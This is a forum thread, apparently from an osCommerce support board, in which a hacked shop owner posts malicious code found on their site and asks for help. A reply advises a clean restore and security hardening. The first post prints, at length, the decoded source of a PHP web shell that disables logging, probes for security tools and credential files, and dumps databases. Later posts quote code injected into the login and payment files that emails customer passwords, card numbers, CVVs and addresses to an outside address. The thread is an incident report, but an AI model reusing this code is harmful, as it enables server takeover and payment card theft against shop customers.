devine952 Posted January 16, 2010 Share Posted January 16, 2010 Hi all, Somehow my site is being used for spamming purposes, 245K emails sent out last night alone. My customer db is only 30k. anyway, while invesitaging, I found function.php in one of my folders with following permissions rwxr-xr-x. The file was encoded using eval(gzinflate(base64_decode so you can search for that line of code in your files. The decoded code: <?php ?><?phpif(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>IT-GLOBAL Rooted</h1>");}$language='eng';$auth = 0;$name='93a04b066fd81a1017825f2dcda313b2'; //night$pass='93a04b066fd81a1017825f2dcda313b2';//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8//@setlocale(LC_ALL,'ru_RU.cp1251');@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");if(@function_exists('ini_set')) { @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1); @ini_set('allow_url_fopen',1); }else { @ini_alter('error_log',NULL); @ini_alter('log_errors',0); @ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1); }error_reporting(E_ALL);/* */$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');$downloaders = array('wget','fetch','lynx','links','curl','get');$donated_act = array(""); //array ("act1","act2,"...), if $act is in 
this array, display $donated_html./* realpath() */$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";$chars_rlph = "_-.01234567890";$chars_rlph = "abcdefghijklnmopqrstuvwxyz";$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php','shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root','my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs','access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');/******************************************************************************************************/$win = strtolower(substr(PHP_OS,0,3)) == "win";define("starttime",@getmicrotime());if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};set_magic_quotes_runtime(0);@set_time_limit(0);if(@function_exists('ini_set')) { @ini_set('max_execution_time',0); @ini_set('output_buffering',0); }else { @ini_alter('max_execution_time',0); @ini_alter('output_buffering',0); }$safe_mode = @ini_get('safe_mode');if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};$version = 'Private - No1';if(@version_compare(@phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; }if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as 
$k=>$v) { $_COOKIE[$k] = stripslashes($v); } }// user + pass ( 1 = no , 0 = yes )if($auth == 1) {if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="No1Relax - Protect !"'); header('HTTP/1.0 401 Unauthorized'); exit("<h1>Access Denied</h1>"); }}if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { $tempdir='./'; $select_tempdir = '<select name=tempdir><option value="./">./</option>'; foreach( $tempdirs as $item) { if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;} } $select_tempdir .= '</select>'; setcookie('tempdir',$tempdir); setcookie('select_tempdir',$select_tempdir);}else{ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} $select_tempdir = $_COOKIE['select_tempdir'];}$head = '<html><head><title>_*-*_[iT-GLOBAL Rooted]_*-*_</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><STYLE>tr {BORDER-RIGHT: #000000 1px solid;BORDER-TOP: #000000 1px solid;BORDER-LEFT: #000000 1px solid;BORDER-BOTTOM: #000000 1px solid;color: #000000;}td {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;color: #ffffff;}.table1 {BORDER: 0px;BACKGROUND-COLOR: #000000;color: #000000;}.td1 {BORDER: 0px;font: 7pt Verdana;color: #ffffff;}.tr1 {BORDER: 0px;color: #ffffff;}table {BORDER: #eeeeee 1px outset;BACKGROUND-COLOR: #000000;color: #000000;}input {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: 8pt Verdana;color: #ffffff;}select {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: 8pt Verdana;color: #ffffff;;}submit {BORDER: buttonhighlight 2px 
outset;BACKGROUND-COLOR: #e4e0d8;width: 30%;color: #000000;}textarea {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: Fixedsys bold;color: #ffffff;}BODY {margin: 1px;color: #000000;background-color: #000000;}A:link {COLOR:red; TEXT-DECORATION: none}A:visited { COLOR:red; TEXT-DECORATION: none}A:active {COLOR:red; TEXT-DECORATION: none}A:hover {color:blue;TEXT-DECORATION: none}</STYLE><script language=\'javascript\'>function hide_div(id){ document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\';}function show_div(id){ document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\';}function change_divst(id){ if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id);}</script>';class zipfile{ var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . 
'";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . 
"\x00\x00"; }}function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } }function moreread($temp){global $lang,$language;$str=''; if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ if($ffile){ while(!@feof($ffile)){$str .= @fgets($ffile);}; fclose($ffile); } }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ if($ffile){ $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } }elseif(@function_exists('file')&&($ffiles = @file($temp))){ foreach ($ffiles as $ffile) { $str .= $ffile; } }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp); }elseif(@function_exists('readfile')){ $str = @readfile($temp); }elseif(@function_exists('highlight_file')){ $str = @highlight_file($temp); }elseif(@function_exists('show_source')){ $str = @show_source($temp); }else{echo $lang[$language.'_text56'];}return $str;}function readzlib($filename,$temp=''){global $lang,$language;$str=''; if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; if(@copy("compress.zlib://".$filename, $temp)) { $str = moreread($temp); } else echo $lang[$language.'_text119']; @unlink($temp);return $str;}function 
morewrite($temp,$str=''){global $lang,$language; if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fwrite($ffile,$str); @fclose($ffile); } }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fputs($ffile,$str); @fclose($ffile); } }elseif(@function_exists('file_put_contents')){ @file_put_contents($temp,$str); }else return 0;return 1;}function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name=\"".$attach['name']."\"\r\n"; $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; }class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!@function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!@function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 
'Oracle': if(!@function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; case 'MySQLi': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysqli_connect')) return 0; $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); if(is_resource($this->connection)) return 1; break; case 'mSQL': if(!@function_exists('msql_connect')) return 0; $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'SQLite': if(!@function_exists('sqlite_open')) return 0; $this->connection = @sqlite_open($this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; case 'MySQLi': return 1; break; case 'mSQL': if(@msql_select_db($this->base,$this->connection)) return 1; break; case 'SQLite': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': 
if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; case 'MySQLi': if(false===($this->res=@mysqli_query($this->connection,$query))) { $this->error = @mysqli_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'mSQL': if(false===($this->res=@msql_query($query,$this->connection))) { $this->error = @msql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'SQLite': if(false===($this->res=@sqlite_query($this->connection,$query))) { $this->error = @sqlite_error_string($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = 
@oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MySQLi': $this->num_rows=@mysqli_num_rows($this->res); $this->num_fields=@mysqli_num_fields($this->res); while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); @mysqli_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'mSQL': $this->num_rows=@msql_num_rows($this->res); $this->num_fields=@msql_num_fields($this->res); while(false !== ($this->rows[] = @msql_fetch_array($this->res))); @msql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'SQLite': $this->num_rows=@sqlite_num_rows($this->res); $this->num_fields=@sqlite_num_fields($this->res); while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) 
VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MySQLi': $this->dump[0] = '## MySQLi dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'mSQL': $this->dump[0] = '## mSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'SQLite': $this->dump[0] = '## SQLite dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; case 'MySQLi': @mysqli_close($this->connection); break; case 'mSQL': @msql_close($this->connection); break; case 'SQLite': @sqlite_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; case 'MySQLi': return @mysqli_affected_rows($this->res); break; case 'mSQL': return @msql_affected_rows($this->res); break; case 'SQLite': return @sqlite_changes($this->res); break; default: return 0; break; } } }if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if($file=moreread($_POST['d_name'])){ $filedump = $file; } else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { @ob_clean(); $filename = @basename($_POST['d_name']); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . 
$content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } }if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#000000>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode(" </b></font></td><td bgcolor=#000000><font face=Verdana size=-2><b> ", $sql->columns); echo "<tr><td bgcolor=#000000><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2> '.$values.' 
</font></td></tr>'; } echo "</table>"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))." ?> I have no idea what it does, other than apparently dump my sql database. I haven't figured out where it dumps it to and if this same file is also responsible for the spamming originating from my website. Any tips on how to prevent this in the future and what this is doing? Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 I found this code in googlemap.php, a file I had never uploaded. There were two instances of this file: one in my /includes/analytics folder and one in my /images/icons folder.
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 List of injected files: googlemap.php, functiondata.php, function.php, inc.php, private.php, creating thumb.php, image.php, which I suspect are the dump files. I could do with some enlightening. I have noticed that most of these files were uploaded into directories whose Owner/Group is shown as 502 503 by Filezilla, whatever that user/group means.
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 More malicious code that I found inserted in my /login.php file $to = "[email protected]"; $subject = "Hang mail pass pilot"; $message = $email_address." | ".$password; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 /public_html/includes/modules/payment/paypal_wpp.php I found this: $to = "[email protected]"; $subject = "Pilotshop"; $message =$order_info['PAYPAL_SHIPPING_NAME']."|".$order_info['PAYPAL_SHIPPING_ADDRESS1']."|".$order_info['PAYPAL_SHIPPING_CITY']."|".$order_info['PAYPAL_SHIPPING_STATE']."|".$order_info['PAYPAL_SHIPPING_ZIP']."|".$order_info['PAYPAL_SHIPPING_COUNTRY']."|".$cc_type."|".$cc_number."|".$cc_checkcode."|".$cc_first_name."|".$cc_last_name."|".$cc_owner_ip."|".$cc_expdate_month."|".$cc_expdate_year ; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 another bit in /public/includes/modules/payment/cc.php $to = "[email protected]"; $subject = "Hang ve pilot"; $message = $HTTP_POST_VARS['cc_owner'] . "|" . $HTTP_POST_VARS['cc_number'] . "|" . $HTTP_POST_VARS['cc_expires_month'] . "|" . $HTTP_POST_VARS['cc_expires_year'] . "|" .$HTTP_POST_VARS['cvvnumber']; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 more in /checkout_payment.php $check_address_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . (int)$customer_id . "' and address_book_id = '" . (int)$billto . "'"); $check_address = tep_db_fetch_array($check_address_query); $to = "[email protected]"; $subject = "Hang ve dia chi pilot"; $message = $check_address['entry_firstname']."|".$check_address['entry_lastname']."|".$check_address['entry_street_address']."|".$check_address['entry_suburb']."|".$check_address['entry_postcode']."|".$check_address['entry_city']."|".$check_address['entry_state']; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 16, 2010 Share Posted January 16, 2010 Well, it seems to be an interesting and different type of hack from the others seen recently, but I am pretty sure the answers for securing your site properly are still the same as ever. It is best to delete the site and database and restore from a clean backup, if you are able to, and then read the threads/posts in the various links I listed here, especially the first one, and apply all the necessary measures. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptions, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!